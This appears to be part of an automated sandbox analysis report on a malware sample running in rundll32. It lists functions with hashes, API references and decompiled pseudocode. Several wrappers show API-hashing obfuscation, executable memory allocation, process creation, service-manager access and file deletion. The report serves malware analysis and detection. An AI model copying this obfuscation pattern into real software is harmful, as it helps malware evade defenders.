Instruction ID: 20d33af75fe9acc88c15c0b877115acd64d50a9615d93646a3a2c871de4e18a3
Opcode Fuzzy Hash: d7eaa5e1d21be338b1cd6ce6653cfaaa8da155c2e378965c531edad88466e545
Instruction Fuzzy Hash: 5C313272D0020CBFDF05DF95CC4A8EEBBB5FB48308F508199F91866220D3B59A659B80

Uniqueness

Uniqueness Score: -1.00%

Function 00473928, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 136
filememoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetEnhMetaFileA.GDI32(trty55345), ref: 004739C2
VirtualAlloc.KERNELBASE(00000000,00476CB4,00001000,00000040), ref: 00473A8E

Strings

trty55345, xrefs: 004739BD
|lG, xrefs: 00473961

Memory Dump Source

Source File: 00000008.00000002.2093676667.0000000000434000.00000020.00020000.sdmp, Offset: 00434000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_434000_rundll32.jbxd

Similarity

API ID: AllocFileMetaVirtual
String ID: trty55345$|lG
API String ID: 2643768156-1821281307
Opcode ID: 3130202e462f7cc5550263aabea82dce620ebf56d3b4669a8b55639d85525ca6
Instruction ID: 7cfdf64c4d5f757b1d89b0236f194887930e7e241da24b37b40c41bac6f86404
Opcode Fuzzy Hash: 3130202e462f7cc5550263aabea82dce620ebf56d3b4669a8b55639d85525ca6
Instruction Fuzzy Hash: C3619070605A019FE752DF29EE86A5537A3F708309B12803AE58D8B271DF75A9C8DF0C

Uniqueness

Uniqueness Score: -1.00%

Function 0041BFA7, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 54
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetFileInformationByHandle.KERNELBASE(003F5F6C,00000000,00000000,00000028), ref: 0041C077

Strings

xk, xrefs: 0041BFCD
l_?, xrefs: 0041BFD6

Memory Dump Source

Source File: 00000008.00000002.2093577825.0000000000410000.00000040.00020000.sdmp, Offset: 00410000, based on PE: true

Associated: 00000008.00000002.2093643430.0000000000431000.00000040.00020000.sdmp Download File
Associated: 00000008.00000002.2093654473.0000000000433000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_410000_rundll32.jbxd

Yara matches

Similarity

API ID: FileHandleInformation
String ID: l_?$xk
API String ID: 3935143524-284769927
Opcode ID: f7ca304d10041dd62d8e1ad4bfbd78abde4e0d4be66e492d5acffa0649bbfc17
Instruction ID: 9e3ce35253908c9365e85b300e31fcd1651c41b31787ee50e020c2743875da47
Opcode Fuzzy Hash: f7ca304d10041dd62d8e1ad4bfbd78abde4e0d4be66e492d5acffa0649bbfc17
Instruction Fuzzy Hash: B22138B2D0030DEBEF41DFE4D94AA9EBBB1FB14314F108089E91076191E3B94B649F80

Uniqueness

Uniqueness Score: -1.00%

Function 004178F0, Relevance: 4.5, APIs: 1, Strings: 2, Instructions: 49
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 31%

			E004178F0(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* _t40;
				int _t49;
				signed int _t51;
				void* _t56;

				_push(_a12);
				_t56 = __ecx;
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E004156B2(_t40);
				_v16 = 0x524d;
				_v16 = _v16 ^ 0x99c40e8a;
				_v16 = _v16 << 0xb;
				_v16 = _v16 ^ 0x22e67b2e;
				_v8 = 0x3b7d;
				_v8 = _v8 << 3;
				_v8 = _v8 << 5;
				_v8 = _v8 + 0xffff78bf;
				_v8 = _v8 ^ 0x003ae656;
				_v12 = 0xe9f0;
				_v12 = _v12 + 0xffff2fbb;
				_v12 = _v12 << 3;
				_v12 = _v12 ^ 0x0000f034;
				_v20 = 0x1cdc;
				_t51 = 0x3d;
				_push(0xf9b1620b);
				_v20 = _v20 / _t51;
				_v20 = _v20 ^ 0x00004e2d;
				_push(0xd18a469);
				E004204D5(_t51 + 0x71, _v20 % _t51);
				_t49 = CloseHandle(_t56); // executed
				return _t49;
			}

0x004178f7
0x004178fa
0x004178fc
0x004178ff
0x00417903
0x00417904
0x00417909
0x00417913
0x0041791c
0x00417920
0x00417927
0x0041792e
0x00417932
0x00417936
0x0041793d
0x00417944
0x0041794b
0x00417952
0x00417956
0x0041795d
0x00417969
0x0041796c
0x00417971
0x00417977
0x0041798d
0x00417992
0x0041799b
0x004179a1

APIs

CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000044), ref: 0041799B

Strings

.{", xrefs: 00417920
V:, xrefs: 0041793D

Memory Dump Source

Source File: 00000008.00000002.2093577825.0000000000410000.00000040.00020000.sdmp, Offset: 00410000, based on PE: true

Associated: 00000008.00000002.2093643430.0000000000431000.00000040.00020000.sdmp Download File
Associated: 00000008.00000002.2093654473.0000000000433000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_410000_rundll32.jbxd

Yara matches

Similarity

API ID: CloseHandle
String ID: .{"$V:
API String ID: 2962429428-4012127490
Opcode ID: 7f2f5ecfd647bd061181deac43e7d57022e936a481046fe213cab76c0819ac8e
Instruction ID: d3e9f1d4f377a5e1723d45e9971ed88bd9c40d4ed3189ade1b236add8347ef6c
Opcode Fuzzy Hash: 7f2f5ecfd647bd061181deac43e7d57022e936a481046fe213cab76c0819ac8e
Instruction Fuzzy Hash: 8A114675D01219EBDF01EFE5C80A8EEBBB4FF00358F108598E42162251D3B44B14DF84

Uniqueness

Uniqueness Score: -1.00%

Function 00471638, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 60
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DdeInitializeA.USER32(00000044,Function_0003D428,00000000,00000000), ref: 00471686

Strings

Link, xrefs: 00471666

Memory Dump Source

Source File: 00000008.00000002.2093676667.0000000000434000.00000020.00020000.sdmp, Offset: 00434000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_434000_rundll32.jbxd

Similarity

API ID: Initialize
String ID: Link
API String ID: 2538663250-2526951119
Opcode ID: a3b07439834285cb0bea3d9f2c7391e6f6946c82cd316377597939dad2df5ba5
Instruction ID: cd51597cd89ac758c9faf89e5b6a22c419be88ff644f2b2a477b4cc396a109fe
Opcode Fuzzy Hash: a3b07439834285cb0bea3d9f2c7391e6f6946c82cd316377597939dad2df5ba5
Instruction Fuzzy Hash: EE11C170700700ABC320EF7A9D82B8E77E4EF44748B90983AF804D7661EA39AA41874C

Uniqueness

Uniqueness Score: -1.00%

Function 0042BC7A, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 55
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 45%

			E0042BC7A(void* __ecx, long __edx, intOrPtr _a4, long _a8, void* _a12) {
				signed int _v8;
				signed int _v12;
				unsigned int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				intOrPtr _v32;
				void* _t49;
				void* _t58;
				signed int _t60;
				long _t65;

				_push(_a12);
				_t65 = __edx;
				_push(_a8);
				_push(_a4);
				_push(__edx);
				E004156B2(_t49);
				_v28 = _v28 & 0x00000000;
				_v24 = _v24 & 0x00000000;
				_v32 = 0x66502c;
				_v20 = 0x768f;
				_v20 = _v20 << 5;
				_v20 = _v20 + 0xfffffbc4;
				_v20 = _v20 ^ 0x000ea418;
				_v16 = 0x500;
				_v16 = _v16 >> 9;
				_v16 = _v16 + 0xffffec62;
				_v16 = _v16 ^ 0xffffff63;
				_v12 = 0xceeb;
				_v12 = _v12 ^ 0x4583d5c1;
				_v12 = _v12 ^ 0xf61c5ed0;
				_v12 = _v12 ^ 0xb39f3c56;
				_v8 = 0x5074;
				_v8 = _v8 >> 0xf;
				_v8 = _v8 << 0xc;
				_t60 = 0x23;
				_push(0xf9b1620b);
				_v8 = _v8 / _t60;
				_v8 = _v8 ^ 0x00001ec9;
				_push(0xb236b160);
				E004204D5(0x11e, _v8 % _t60);
				_t58 = RtlAllocateHeap(_a12, _a8, _t65); // executed
				return _t58;
			}

0x0042bc81
0x0042bc84
0x0042bc86
0x0042bc89
0x0042bc8c
0x0042bc8e
0x0042bc93
0x0042bc9a
0x0042bca0
0x0042bca7
0x0042bcae
0x0042bcb2
0x0042bcb9
0x0042bcc0
0x0042bcc7
0x0042bccb
0x0042bcd2
0x0042bcd9
0x0042bce0
0x0042bce7
0x0042bcee
0x0042bcf5
0x0042bcfc
0x0042bd00
0x0042bd09
0x0042bd0c
0x0042bd11
0x0042bd17
0x0042bd2f
0x0042bd34
0x0042bd43
0x0042bd49

APIs

RtlAllocateHeap.NTDLL(000EA418,FFFFFF63,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0042BD43

Strings

,Pf, xrefs: 0042BCA0

Memory Dump Source

Source File: 00000008.00000002.2093577825.0000000000410000.00000040.00020000.sdmp, Offset: 00410000, based on PE: true

Associated: 00000008.00000002.2093643430.0000000000431000.00000040.00020000.sdmp Download File
Associated: 00000008.00000002.2093654473.0000000000433000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_410000_rundll32.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID: ,Pf
API String ID: 1279760036-3497852847
Opcode ID: ad5329f324947bd6ad91a5ee611d71534c280ea3f991268019b2c6de388f8791
Instruction ID: 0586c5fbab207340f3da8a1e84a6ebec273b0178fef15e03497b1970debe451b
Opcode Fuzzy Hash: ad5329f324947bd6ad91a5ee611d71534c280ea3f991268019b2c6de388f8791
Instruction Fuzzy Hash: 212144B2D0020CEBDF14DFE5C84A9DEBBB0FB50318F108188E92566291D3B94B14CF80

Uniqueness

Uniqueness Score: -1.00%

Function 0041DA66, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 48
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 88%

			E0041DA66(int __ecx, void* __edx, intOrPtr _a4, intOrPtr _a12) {
				signed int _v8;
				unsigned int _v12;
				signed int _v16;
				unsigned int _v20;
				void* _t31;
				void* _t39;
				int _t44;

				_push(_a12);
				_t44 = __ecx;
				_push(0);
				E004156B2(_t31);
				_v12 = 0x9824;
				_v12 = _v12 | 0xcb7da71d;
				_v12 = _v12 >> 9;
				_v12 = _v12 ^ 0x00658752;
				_v8 = 0xd578;
				_v8 = _v8 << 0xc;
				_v8 = _v8 << 0xe;
				_v8 = _v8 ^ 0xe0002fd4;
				_v20 = 0xfe7d;
				_v20 = _v20 >> 8;
				_v20 = _v20 ^ 0x0000585e;
				_v16 = 0x6de1;
				_v16 = _v16 * 0x4e;
				_v16 = _v16 ^ 0x00213735;
				E004204D5(0x133, __edx, 0x247cad2d, 0x44ef1c65, __ecx, 0, _a4);
				_t39 = OpenSCManagerW(0, 0, _t44); // executed
				return _t39;
			}

0x0041da6e
0x0041da73
0x0041da75
0x0041da7b
0x0041da80
0x0041da8a
0x0041da96
0x0041da9a
0x0041daa1
0x0041daa8
0x0041daac
0x0041dab0
0x0041dab7
0x0041dabe
0x0041dac2
0x0041dac9
0x0041dadc
0x0041dadf
0x0041daf7
0x0041db02
0x0041db09

APIs

OpenSCManagerW.SECHOST(00000000,00000000,F184FF7E,?,?,?,?,?,?,?,?,?,?,?,00000000,000043DE), ref: 0041DB02

Strings

57!, xrefs: 0041DADF

Memory Dump Source

Source File: 00000008.00000002.2093577825.0000000000410000.00000040.00020000.sdmp, Offset: 00410000, based on PE: true

Associated: 00000008.00000002.2093643430.0000000000431000.00000040.00020000.sdmp Download File
Associated: 00000008.00000002.2093654473.0000000000433000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_410000_rundll32.jbxd

Yara matches

Similarity

API ID: ManagerOpen
String ID: 57!
API String ID: 1889721586-26168835
Opcode ID: 7502bf563648451cdc6ee3fba127c124e0b279864468f40488bc13250c57ca7a
Instruction ID: 1eeb2da231eb96b39224337088cf0f268220464567f228cd7bfbd224eedbc353
Opcode Fuzzy Hash: 7502bf563648451cdc6ee3fba127c124e0b279864468f40488bc13250c57ca7a
Instruction Fuzzy Hash: 62113671D0020CBBDB04EFA6CC498DEBFB4EB80348F108099E825A3251D7B54B14CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 00730540, Relevance: 3.3, APIs: 2, Instructions: 252memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE(?,?,00000040,?), ref: 0073058F
VirtualProtect.KERNELBASE(?,?,00000000), ref: 007307D9

Memory Dump Source

Source File: 00000008.00000002.2094445834.0000000000710000.00000040.00000001.sdmp, Offset: 00710000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_710000_rundll32.jbxd

Yara matches

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: ad1daf5a7c910bd02d1d72619915e1fdd92f553c09c4da0439c37bff57805f65
Instruction ID: c5d88ae65525314a139a569242fb38c42bb64f2a1d04f87e417b9f7aaee41cec
Opcode Fuzzy Hash: ad1daf5a7c910bd02d1d72619915e1fdd92f553c09c4da0439c37bff57805f65
Instruction Fuzzy Hash: A9C1C975A00209DFDB48CF98C591EAEB7B5BF88304F248159E809AB356D735EE52CF90

Uniqueness

Uniqueness Score: -1.00%

Function 00471A14, Relevance: 3.1, APIs: 2, Instructions: 56serviceCOMMON

Download Yara Rule

APIs

Part of subcall function 00471AC8: DdeFreeStringHandle.USER32(?,?), ref: 00471AE8

DdeCreateStringHandleA.USER32(?,00000000), ref: 00471A82
DdeNameService.USER32(?,00000000,00000000,00000001), ref: 00471A95

Memory Dump Source

Source File: 00000008.00000002.2093676667.0000000000434000.00000020.00020000.sdmp, Offset: 00434000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_434000_rundll32.jbxd

Similarity

API ID: HandleString$CreateFreeNameService
String ID:
API String ID: 374373348-0
Opcode ID: b03bf6cde743b102401b81ea2bddc8feb5639e41f23d8f6bc43e6226688da1b4
Instruction ID: 39d027c5ca5e68471d7e18349be7a76208ccc3b7fbc2e24e4635679c6edb1c3e
Opcode Fuzzy Hash: b03bf6cde743b102401b81ea2bddc8feb5639e41f23d8f6bc43e6226688da1b4
Instruction Fuzzy Hash: 8411C270711240AFCB11EFA9C882E8A37ACAF89B04B5041A6FC049B256D678ED40879C

Uniqueness

Uniqueness Score: -1.00%

Function 00730020, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 46memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 007300A4

Strings

VirtualAlloc, xrefs: 00730089, 0073008C

Memory Dump Source

Source File: 00000008.00000002.2094445834.0000000000710000.00000040.00000001.sdmp, Offset: 00710000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_710000_rundll32.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID: VirtualAlloc
API String ID: 4275171209-164498762
Opcode ID: a77aec488e472259a9f8f903e2d2770156d735046b38bce3c934600cf440992a
Instruction ID: fd9e3dbbf0b337078c463ae71030db0d2af99dbad800c424aef49eaa327a8615
Opcode Fuzzy Hash: a77aec488e472259a9f8f903e2d2770156d735046b38bce3c934600cf440992a
Instruction Fuzzy Hash: BF11DD60D082C9EAEF01D7E89419BFEBFB55B11708F044098E6446A282D6BE57588BE6

Uniqueness

Uniqueness Score: -1.00%

Function 0042F2F9, Relevance: 1.6, APIs: 1, Instructions: 72
processCOMMON

Download Yara Rule

C-Code - Quality: 30%

			E0042F2F9(void* __edx, WCHAR* _a8, WCHAR* _a12, int _a16, struct _STARTUPINFOW* _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a36, intOrPtr _a40, intOrPtr _a44, struct _PROCESS_INFORMATION* _a56) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				struct _SECURITY_ATTRIBUTES* _v24;
				intOrPtr _v28;
				void* _t54;
				int _t64;
				signed int _t65;

				_push(_a56);
				_push(0);
				_push(0);
				_push(_a44);
				_push(_a40);
				_push(_a36);
				_push(0);
				_push(_a28);
				_push(_a24);
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(0);
				_push(0);
				E004156B2(_t54);
				_v28 = 0x170c99;
				_v24 = 0;
				_v16 = 0x438d;
				_v16 = _v16 ^ 0x1c0fc040;
				_v16 = _v16 + 0xffffa13b;
				_v16 = _v16 ^ 0x1c0f1065;
				_v8 = 0x7b12;
				_v8 = _v8 + 0xe48b;
				_v8 = _v8 << 2;
				_t65 = 0x70;
				_push(0xf9b1620b);
				_v8 = _v8 * 0x77;
				_v8 = _v8 ^ 0x028dd8b4;
				_v20 = 0x8aa6;
				_v20 = _v20 + 0x376a;
				_v20 = _v20 ^ 0x0000ade9;
				_v12 = 0x19;
				_push(0x90aa198d);
				_v12 = _v12 / _t65;
				_v12 = _v12 << 0xc;
				_v12 = _v12 ^ 0x00005708;
				E004204D5(0x2ee, _v12 % _t65);
				_t64 = CreateProcessW(_a8, _a12, 0, 0, _a16, 0, 0, 0, _a20, _a56); // executed
				return _t64;
			}

0x0042f300
0x0042f305
0x0042f306
0x0042f307
0x0042f30a
0x0042f30d
0x0042f310
0x0042f311
0x0042f314
0x0042f317
0x0042f31a
0x0042f31d
0x0042f320
0x0042f323
0x0042f325
0x0042f326
0x0042f32b
0x0042f335
0x0042f33a
0x0042f341
0x0042f348
0x0042f34f
0x0042f356
0x0042f35d
0x0042f364
0x0042f36e
0x0042f36f
0x0042f377
0x0042f37a
0x0042f381
0x0042f388
0x0042f38f
0x0042f396
0x0042f3a2
0x0042f3a7
0x0042f3af
0x0042f3b3
0x0042f3c6
0x0042f3e2
0x0042f3e8

APIs

CreateProcessW.KERNEL32(1C0F1065,0000ADE9,00000000,00000000,?,00000000,00000000,00000000,00170C99,?), ref: 0042F3E2

Memory Dump Source

Source File: 00000008.00000002.2093577825.0000000000410000.00000040.00020000.sdmp, Offset: 00410000, based on PE: true

Associated: 00000008.00000002.2093643430.0000000000431000.00000040.00020000.sdmp Download File
Associated: 00000008.00000002.2093654473.0000000000433000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_410000_rundll32.jbxd

Yara matches

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 026aef61d0656430dbbcca425602156f2ab332a660c9be10ca3ab0af62cf9408
Instruction ID: 4b7acd9744969539c324fb1d71de5eb9216de560a736db9785c18a66555c4cce
Opcode Fuzzy Hash: 026aef61d0656430dbbcca425602156f2ab332a660c9be10ca3ab0af62cf9408
Instruction Fuzzy Hash: B931E072901218FBDF11DEA5C90A8DFBFB5FF08354F108188F91866260D3768A64EF90

Uniqueness

Uniqueness Score: -1.00%

Function 00411D54, Relevance: 1.6, APIs: 1, Instructions: 57COMMON

Download Yara Rule

APIs

SHGetFolderPathW.SHELL32(00000000,?,00000000,00000000,?), ref: 00411E0C

Memory Dump Source

Source File: 00000008.00000002.2093577825.0000000000410000.00000040.00020000.sdmp, Offset: 00410000, based on PE: true

Associated: 00000008.00000002.2093643430.0000000000431000.00000040.00020000.sdmp Download File
Associated: 00000008.00000002.2093654473.0000000000433000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_410000_rundll32.jbxd

Yara matches

Similarity

API ID: FolderPath
String ID:
API String ID: 1514166925-0
Opcode ID: 7893705023e0342a7cd03c01fb48380ada36fa37b15ddf495c5e823a11f917f8
Instruction ID: 705a9a52ffc5e3bc771f5aa1c6a64af1b294103223bb1b316082bac8a1cffb4c
Opcode Fuzzy Hash: 7893705023e0342a7cd03c01fb48380ada36fa37b15ddf495c5e823a11f917f8
Instruction Fuzzy Hash: F6213072D01218BBDF01AFE5CC4A8EEBFB4FB05318F108089E914622A0D3799A20DB91

Uniqueness

Uniqueness Score: -1.00%

Function 0042C9E4, Relevance: 1.6, APIs: 1, Instructions: 52
COMMON

Download Yara Rule

C-Code - Quality: 39%

			E0042C9E4(void* __edx, intOrPtr _a4, struct _SHFILEOPSTRUCTW* _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* __ecx;
				void* _t44;
				int _t56;
				signed int _t58;
				signed int _t59;
				void* _t60;

				_push(_a8);
				_push(_a4);
				E004156B2(_t44);
				_v20 = 0x119d;
				_v20 = _v20 + 0x9ae3;
				_v20 = _v20 ^ 0x0000f3ba;
				_v16 = 0x15c9;
				_t58 = 0x44;
				_v16 = _v16 / _t58;
				_v16 = _v16 << 2;
				_v16 = _v16 ^ 0x00002259;
				_v8 = 0x1145;
				_t59 = 0x6f;
				_push(0xbb4be11c);
				_v8 = _v8 * 0x14;
				_v8 = _v8 + 0x4d6;
				_v8 = _v8 | 0x2b983bc8;
				_v8 = _v8 ^ 0x2b990745;
				_v12 = 0xa8da;
				_push(0xbecb068);
				_v12 = _v12 / _t59;
				_v12 = _v12 + 0x20ab;
				_v12 = _v12 ^ 0x00003eb1;
				_t60 = 0x6d;
				E004204D5(_t60, _v12 % _t59);
				_t56 = SHFileOperationW(_a8); // executed
				return _t56;
			}

0x0042c9ea
0x0042c9ed
0x0042c9f2
0x0042c9f7
0x0042ca01
0x0042ca0a
0x0042ca11
0x0042ca1d
0x0042ca22
0x0042ca27
0x0042ca2b
0x0042ca32
0x0042ca3d
0x0042ca3e
0x0042ca46
0x0042ca49
0x0042ca50
0x0042ca57
0x0042ca5e
0x0042ca6a
0x0042ca6f
0x0042ca72
0x0042ca79
0x0042ca8e
0x0042ca8f
0x0042ca9a
0x0042ca9f

APIs

SHFileOperationW.SHELL32(00002259), ref: 0042CA9A

Memory Dump Source

Source File: 00000008.00000002.2093577825.0000000000410000.00000040.00020000.sdmp, Offset: 00410000, based on PE: true

Associated: 00000008.00000002.2093643430.0000000000431000.00000040.00020000.sdmp Download File
Associated: 00000008.00000002.2093654473.0000000000433000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_410000_rundll32.jbxd

Yara matches

Similarity

API ID: FileOperation
String ID:
API String ID: 3080627654-0
Opcode ID: e39559b1d037a91dc0661b176709d71676d8dbfe721d595248926b0b633630f9
Instruction ID: 93df560af84c3fc52ab6437942b913d6591801bb2af22b8c72366a7c178d0569
Opcode Fuzzy Hash: e39559b1d037a91dc0661b176709d71676d8dbfe721d595248926b0b633630f9
Instruction Fuzzy Hash: B4112971E00308FBEF48DFE5D94A8DDBBB1EB40314F10C199E524AA291D7B95B549F80

Uniqueness

Uniqueness Score: -1.00%

Function 00413708, Relevance: 1.6, APIs: 1, Instructions: 50
libraryCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E00413708(void* __ecx, void* __edx, intOrPtr _a4, WCHAR* _a8, intOrPtr _a12) {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				unsigned int _v20;
				signed int _v24;
				signed int _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				void* _t49;
				struct HINSTANCE__* _t58;

				_push(_a12);
				_push(_a8);
				E004156B2(_t49);
				_v28 = _v28 & 0x00000000;
				_v24 = _v24 & 0x00000000;
				_v36 = 0x3a6ac4;
				_v32 = 0x1f58c;
				_v20 = 0xda16;
				_v20 = _v20 << 6;
				_v20 = _v20 >> 0xf;
				_v20 = _v20 ^ 0x000007d8;
				_v16 = 0xc632;
				_v16 = _v16 * 0x5e;
				_v16 = _v16 >> 0xe;
				_v16 = _v16 ^ 0x3072f0c0;
				_v16 = _v16 ^ 0x30728ae3;
				_v12 = 0x2b62;
				_v12 = _v12 << 5;
				_v12 = _v12 + 0xeea3;
				_v12 = _v12 | 0x9d0e8eab;
				_v12 = _v12 ^ 0x9d0e92d8;
				_v8 = 0x59be;
				_v8 = _v8 * 0xc;
				_v8 = _v8 << 0xf;
				_v8 = _v8 >> 2;
				_v8 = _v8 ^ 0x069d3080;
				E004204D5(0x132, __edx, 0xc9745c6b, 0xf9b1620b, __ecx, __edx, _a4);
				_t58 = LoadLibraryW(_a8); // executed
				return _t58;
			}

0x0041370e
0x00413711
0x00413719
0x0041371e
0x00413725
0x0041372e
0x00413735
0x0041373c
0x00413743
0x00413747
0x0041374b
0x00413752
0x00413765
0x00413768
0x0041376c
0x00413773
0x0041377a
0x00413781
0x00413785
0x0041378c
0x00413793
0x0041379a
0x004137aa
0x004137ad
0x004137b1
0x004137b5
0x004137c8
0x004137d3
0x004137d8

APIs

LoadLibraryW.KERNEL32(30728AE3), ref: 004137D3

Memory Dump Source

Source File: 00000008.00000002.2093577825.0000000000410000.00000040.00020000.sdmp, Offset: 00410000, based on PE: true

Associated: 00000008.00000002.2093643430.0000000000431000.00000040.00020000.sdmp Download File
Associated: 00000008.00000002.2093654473.0000000000433000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_410000_rundll32.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 197e89180ee6ad8ede3567d8a7ffd2df6677f249adb172faf506ffb0aacfaaeb
Instruction ID: 80b6dcd8eb24beee1afb4514f8bd033b975d4a6449803aa4b960f988624f146f
Opcode Fuzzy Hash: 197e89180ee6ad8ede3567d8a7ffd2df6677f249adb172faf506ffb0aacfaaeb
Instruction Fuzzy Hash: ED21EDB5C0120DEBDF04DFE5C94A5EEBBB0FB40308F108199E421A6291C3B98B58DF85

Uniqueness

Uniqueness Score: -1.00%

Function 0042F23C, Relevance: 1.5, APIs: 1, Instructions: 49
serviceCOMMON

Download Yara Rule

C-Code - Quality: 31%

			E0042F23C(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* _t40;
				int _t49;
				signed int _t51;
				void* _t56;

				_push(_a12);
				_t56 = __edx;
				_push(_a8);
				_push(_a4);
				_push(__edx);
				E004156B2(_t40);
				_v8 = 0x224;
				_t51 = 0x60;
				_push(0x44ef1c65);
				_v8 = _v8 / _t51;
				_v8 = _v8 + 0x6797;
				_v8 = _v8 + 0xffff05c4;
				_v8 = _v8 ^ 0xffff46f6;
				_v16 = 0x944a;
				_v16 = _v16 + 0xffff0be3;
				_v16 = _v16 | 0xb1186cfb;
				_v16 = _v16 ^ 0xffff8f5a;
				_v12 = 0xd484;
				_v12 = _v12 + 0xffffefed;
				_v12 = _v12 << 6;
				_v12 = _v12 ^ 0x00310178;
				_v20 = 0x4577;
				_v20 = _v20 ^ 0x01418ea5;
				_v20 = _v20 ^ 0x0141ca29;
				_push(0xb49340c);
				E004204D5(0x344, _v8 % _t51);
				_t49 = CloseServiceHandle(_t56); // executed
				return _t49;
			}

0x0042f243
0x0042f246
0x0042f248
0x0042f24b
0x0042f24e
0x0042f250
0x0042f255
0x0042f266
0x0042f269
0x0042f26e
0x0042f274
0x0042f280
0x0042f287
0x0042f28e
0x0042f295
0x0042f29c
0x0042f2a3
0x0042f2aa
0x0042f2b1
0x0042f2b8
0x0042f2bc
0x0042f2c3
0x0042f2ca
0x0042f2d1
0x0042f2e4
0x0042f2e9
0x0042f2f2
0x0042f2f8

APIs

CloseServiceHandle.SECHOST(00000000,?,?,?,?,?,?,?,?,?,?,?,?,000043DE), ref: 0042F2F2

Memory Dump Source

Source File: 00000008.00000002.2093577825.0000000000410000.00000040.00020000.sdmp, Offset: 00410000, based on PE: true

Associated: 00000008.00000002.2093643430.0000000000431000.00000040.00020000.sdmp Download File
Associated: 00000008.00000002.2093654473.0000000000433000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_410000_rundll32.jbxd

Yara matches

Similarity

API ID: CloseHandleService
String ID:
API String ID: 1725840886-0
Opcode ID: 79899113739317072f9456874e3800ea4c3a137c92767be877347b61ad0d3eb2
Instruction ID: 4d68a7b30559ebb7780f414ab137aeda29bfc6b7b9f186c68c40e928700c7b3b
Opcode Fuzzy Hash: 79899113739317072f9456874e3800ea4c3a137c92767be877347b61ad0d3eb2
Instruction Fuzzy Hash: 641146B1D00319FBDB48EFE8D8099DEBBB1EB44328F108199E819662A1D3B55B159F90

Uniqueness

Uniqueness Score: -1.00%

Function 00413CA0, Relevance: 1.5, APIs: 1, Instructions: 42
fileCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E00413CA0(void* __ecx, void* __edx, intOrPtr _a4, WCHAR* _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* _t35;
				int _t44;

				_push(_a12);
				_push(_a8);
				E004156B2(_t35);
				_v8 = 0xeec1;
				_v8 = _v8 ^ 0xfbd2ad32;
				_v8 = _v8 + 0xfffff390;
				_v8 = _v8 << 0xb;
				_v8 = _v8 ^ 0x91bc56ae;
				_v20 = 0x8655;
				_v20 = _v20 | 0x9ba832dd;
				_v20 = _v20 ^ 0x9ba8a02c;
				_v12 = 0xe2da;
				_v12 = _v12 * 0x55;
				_v12 = _v12 + 0x6f0c;
				_v12 = _v12 ^ 0x004b9e8a;
				_v16 = 0xbc2e;
				_v16 = _v16 * 0x47;
				_v16 = _v16 ^ 0x003455f6;
				E004204D5(0x351, __edx, 0x537fce19, 0xf9b1620b, __ecx, __edx, _a4);
				_t44 = DeleteFileW(_a8); // executed
				return _t44;
			}

0x00413ca6
0x00413ca9
0x00413cb1
0x00413cb6
0x00413cc0
0x00413ccc
0x00413cd3
0x00413cd7
0x00413cde
0x00413ce5
0x00413cec
0x00413cf3
0x00413d06
0x00413d09
0x00413d10
